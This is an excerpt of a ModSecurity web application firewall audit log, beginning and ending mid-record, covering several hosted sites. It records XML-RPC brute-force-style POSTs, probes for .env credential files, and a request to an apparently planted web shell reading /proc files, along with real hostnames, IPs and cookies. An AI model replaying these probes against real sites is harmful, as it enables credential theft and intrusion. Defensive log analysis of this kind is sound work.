en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fd42b815-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --fd42b815-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE79OkmAj8yxyFrMChhxbQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007098607858 249086 (- - -) Stopwatch2: 1750007098607858 249086; combined=2209, p1=383, p2=1439, p3=65, p4=48, p5=171, sr=105, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd42b815-Z-- --dd25f369-A-- [15/Jun/2025:22:35:03.940325 +0530] aE79P940YvvHR2Fi0mNKnAAAAAk 128.199.112.101 49348 127.0.0.1 7081 --dd25f369-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --dd25f369-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --dd25f369-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE79P940YvvHR2Fi0mNKnAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007103004676 935706 (- - -) Stopwatch2: 1750007103004676 935706; combined=2252, p1=360, p2=1472, p3=46, p4=64, p5=191, sr=100, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd25f369-Z-- --10b4aa3e-A-- [15/Jun/2025:22:35:15.635646 +0530] aE79SztuDRGAAnNiXIeirwAAAAg 34.203.111.15 57564 127.0.0.1 7081 --10b4aa3e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/net&viewfile=//proc/net/udplite HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.203.111.15 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --10b4aa3e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3021 Connection: close Content-Type: text/html; charset=UTF-8 --10b4aa3e-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udplite"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udplite"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE79SztuDRGAAnNiXIeirwAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750007115631845 3862 (- - -) Stopwatch2: 1750007115631845 3862; combined=1965, p1=343, p2=1512, p3=33, p4=26, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10b4aa3e-Z-- --dee2332f-A-- [15/Jun/2025:22:35:59.787857 +0530] aE79d5K-05zbifgH_rQJ5QAAAAU 124.109.12.110 44762 127.0.0.1 7081 --dee2332f-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dee2332f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --dee2332f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE79d5K-05zbifgH_rQJ5QAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007159542347 245586 (- - -) Stopwatch2: 1750007159542347 245586; combined=2456, p1=370, p2=1609, p3=77, p4=55, p5=210, sr=94, sw=135, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dee2332f-Z-- --2ac04a7d-A-- [15/Jun/2025:22:36:04.857506 +0530] aE79e940YvvHR2Fi0mNKuwAAAAk 128.199.112.101 45064 127.0.0.1 7081 --2ac04a7d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2ac04a7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2ac04a7d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE79e940YvvHR2Fi0mNKuwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007163907579 949995 (- - -) Stopwatch2: 1750007163907579 949995; combined=1937, p1=312, p2=1232, p3=42, p4=64, p5=176, sr=79, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ac04a7d-Z-- --df88b670-A-- [15/Jun/2025:22:37:05.041105 +0530] aE79uIw8YNvdo5WL3nerFgAAAAc 128.199.112.101 58236 127.0.0.1 7081 --df88b670-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --df88b670-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --df88b670-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE79uIw8YNvdo5WL3nerFgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007224084401 956759 (- - -) Stopwatch2: 1750007224084401 956759; combined=2533, p1=465, p2=1712, p3=41, p4=59, p5=160, sr=141, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df88b670-Z-- --8557422e-A-- [15/Jun/2025:22:37:58.415097 +0530] aE797vVluSm0zKldlXc2gAAAAAA 124.109.12.110 49396 127.0.0.1 7081 --8557422e-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 700 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8557422e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --8557422e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE797vVluSm0zKldlXc2gAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007278172129 243039 (- - -) Stopwatch2: 1750007278172129 243039; combined=2294, p1=367, p2=1540, p3=65, p4=47, p5=172, sr=96, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8557422e-Z-- --d6d23b45-A-- [15/Jun/2025:22:38:05.990253 +0530] aE799QZ37L8e68IeSGnscAAAAAo 128.199.112.101 33294 127.0.0.1 7081 --d6d23b45-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d6d23b45-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d6d23b45-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE799QZ37L8e68IeSGnscAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007285032185 958124 (- - -) Stopwatch2: 1750007285032185 958124; combined=2470, p1=392, p2=1675, p3=53, p4=70, p5=175, sr=120, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6d23b45-Z-- --dd22c634-A-- [15/Jun/2025:22:39:06.865564 +0530] aE7-Mb59833JshVCMq_eJAAAAAY 128.199.112.101 59822 127.0.0.1 7081 --dd22c634-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --dd22c634-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --dd22c634-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7-Mb59833JshVCMq_eJAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007345932949 932672 (- - -) Stopwatch2: 1750007345932949 932672; combined=2346, p1=386, p2=1580, p3=40, p4=64, p5=171, sr=94, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd22c634-Z-- --66eadf06-A-- [15/Jun/2025:22:39:11.031251 +0530] aE7-NUmAj8yxyFrMChhx5wAAAAE 24.226.180.125 53990 127.0.0.1 7081 --66eadf06-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 24.226.180.125 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.9902.1504 Mobile Safari/537.36 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=7ebe85bdc72ee1041508641354ecb7d91750007338; _ga_PETSZCXF5J=GS2.1.s1750007346$o1$g0$t1750007346$j60$l0$h0; _ga=GA1.1.796364921.1750007347; _fbp=fb.1.1750007349712.981076906662572896 --66eadf06-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=f8hhlqir1rn0hbvaae4hk6pa9l; expires=Sat, 13 Sep 2025 17:09:10 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --66eadf06-E-- --66eadf06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7-NUmAj8yxyFrMChhx5wAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7-NUmAj8yxyFrMChhx5wAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007349981627 1049743 (- - -) Stopwatch2: 1750007349981627 1049743; combined=3956, p1=494, p2=3169, p3=122, p4=40, p5=131, sr=146, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750007347" "-" Engine-Mode: "DETECTION_ONLY" --66eadf06-Z-- --cb8f9840-A-- [15/Jun/2025:22:39:38.099605 +0530] aE7-UEmAj8yxyFrMChhx-QAAAAE 20.198.243.91 37580 127.0.0.1 7081 --cb8f9840-B-- GET /.env HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 20.198.243.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --cb8f9840-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=b6a26bf05606710de8f522e14e6db4961750007377; expires=Sun, 15 Jun 2025 18:09:37 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --cb8f9840-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/.env"] [unique_id "aE7-UEmAj8yxyFrMChhx-QAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007376964406 1135283 (- - -) Stopwatch2: 1750007376964406 1135283; combined=1747, p1=375, p2=1233, p3=0, p4=0, p5=138, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb8f9840-Z-- --07cdd37a-A-- [15/Jun/2025:22:39:42.597328 +0530] aE7-VQZ37L8e68IeSGnspAAAAAo 20.198.243.91 36674 127.0.0.1 7081 --07cdd37a-B-- GET /sendgrid/.env HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 20.198.243.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --07cdd37a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=938e12584fcd91cae5a3c9137c83a4fe1750007382; expires=Sun, 15 Jun 2025 18:09:42 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --07cdd37a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/sendgrid/.env"] [unique_id "aE7-VQZ37L8e68IeSGnspAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007381903111 694281 (- - -) Stopwatch2: 1750007381903111 694281; combined=1792, p1=350, p2=1346, p3=0, p4=0, p5=95, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --07cdd37a-Z-- --d091a138-A-- [15/Jun/2025:22:39:53.847851 +0530] aE7-YUmAj8yxyFrMChhyAAAAAAE 124.109.12.110 47588 127.0.0.1 7081 --d091a138-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 699 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d091a138-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --d091a138-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7-YUmAj8yxyFrMChhyAAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007393535807 312104 (- - -) Stopwatch2: 1750007393535807 312104; combined=2317, 